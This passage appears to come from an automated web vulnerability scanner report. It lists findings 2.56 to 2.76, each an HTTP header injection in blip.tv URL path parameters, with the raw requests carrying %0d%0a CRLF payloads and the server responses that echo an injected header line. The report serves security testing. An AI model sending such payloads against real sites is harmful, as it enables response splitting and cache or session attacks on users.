?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 376
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 344223698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5186e
79aa2929b74?file
...[SNIP]...

2.56. http://blip.tv/file/4644899 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4644899

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12279%0d%0ae4d4ddbbb2b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12279%0d%0ae4d4ddbbb2b/4644899 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/12279
e4d4ddbbb2b
/4644899
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1248906018
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/12279
e4d4ddbbb2b/4644899">
...[SNIP]...

2.57. http://blip.tv/file/4644899 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4644899

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 903a0%0d%0a91461411a13 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/903a0%0d%0a91461411a13 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/903a0
91461411a13

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1248906077
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/903a0
91461411a13">her
...[SNIP]...

2.58. http://blip.tv/file/4645321 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4645321

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 934d6%0d%0ae4e44b51785 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /934d6%0d%0ae4e44b51785/4645321 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/934d6
e4e44b51785
/4645321
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1498217234
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/934d6
e4e44b51785/4645321">
...[SNIP]...

2.59. http://blip.tv/file/4645321 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4645321

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bef6c%0d%0ac729cead865 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/bef6c%0d%0ac729cead865 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/bef6c
c729cead865

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1025267327
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/bef6c
c729cead865">her
...[SNIP]...

2.60. http://blip.tv/file/4648265 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648265

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9745c%0d%0a520cfc6583a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9745c%0d%0a520cfc6583a/4648265 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/9745c
520cfc6583a
/4648265
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1248905826
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9745c
520cfc6583a/4648265">
...[SNIP]...

2.61. http://blip.tv/file/4648265 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648265

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e99ba%0d%0a03b90571645 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e99ba%0d%0a03b90571645 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/e99ba
03b90571645

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:32 GMT
X-Varnish: 1248905867
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e99ba
03b90571645">her
...[SNIP]...

2.62. http://blip.tv/file/4648488 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648488

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fd583%0d%0a41c0b66503e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fd583%0d%0a41c0b66503e/4648488 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fd583
41c0b66503e
/4648488
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 2146046122
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fd583
41c0b66503e/4648488">
...[SNIP]...

2.63. http://blip.tv/file/4648488 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648488

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 355ea%0d%0a83299189f58 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/355ea%0d%0a83299189f58 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/355ea
83299189f58

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1324527973
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/355ea
83299189f58">her
...[SNIP]...

2.64. http://blip.tv/file/4650005 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4650005

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3418e%0d%0ae1c7f4e2e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3418e%0d%0ae1c7f4e2e20/4650005 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3418e
e1c7f4e2e20
/4650005
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046304
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3418e
e1c7f4e2e20/4650005">
...[SNIP]...

2.65. http://blip.tv/file/4650005 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4650005

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44404%0d%0a50fe40dacb2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/44404%0d%0a50fe40dacb2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/44404
50fe40dacb2

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046349
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/44404
50fe40dacb2">her
...[SNIP]...

2.66. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac072%0d%0a258f254ae06 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac072%0d%0a258f254ae06/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ac072
258f254ae06
/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527517
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ac072
258f254ae06/get/Ama20
...[SNIP]...

2.67. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 31917%0d%0aa0db1a8f74f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/31917%0d%0aa0db1a8f74f/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/31917
a0db1a8f74f
/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1025267014
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/31917
a0db1a8f74f/Ama2
...[SNIP]...

2.68. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c462e%0d%0af639ff48709 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/c462e%0d%0af639ff48709 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/c462e
f639ff48709

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1274881938
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/c462e
f639ff48709"
...[SNIP]...

2.69. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 108bb%0d%0a5a88d344650 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /108bb%0d%0a5a88d344650/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/108bb
5a88d344650
/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 344227222
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/108bb
5a88d344650/get/Ama20
...[SNIP]...

2.70. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4aab6%0d%0a56621af0bdb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/4aab6%0d%0a56621af0bdb/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/4aab6
56621af0bdb
/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1248905461
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/4aab6
56621af0bdb/Ama2
...[SNIP]...

2.71. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 74bb7%0d%0a5b28c074473 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/74bb7%0d%0a5b28c074473 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/74bb7
5b28c074473

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 2146045865
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/74bb7
5b28c074473"
...[SNIP]...

2.72. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d0a48%0d%0a04d7f7c54c3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d0a48%0d%0a04d7f7c54c3/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/d0a48
04d7f7c54c3
/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 326
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1025265403
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d0a48
04d7f7c54c3/get/Armch
...[SNIP]...

2.73. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 26ddf%0d%0aec507006938 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/26ddf%0d%0aec507006938/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/26ddf
ec507006938
/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 327
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1025265483
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/26ddf
ec507006938/Armc
...[SNIP]...

2.74. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 41209%0d%0ac3c45ea772d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/41209%0d%0ac3c45ea772d HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/41209
c3c45ea772d

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1498215508
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/41209
c3c45ea772d"
...[SNIP]...

2.75. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload be36f%0d%0a55b217f8a8e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /be36f%0d%0a55b217f8a8e/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/be36f
55b217f8a8e
/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 326
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1274880254
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/be36f
55b217f8a8e/get/Armch
...[SNIP]...

2.76. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b2f74%0d%0af13dc8c7cfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

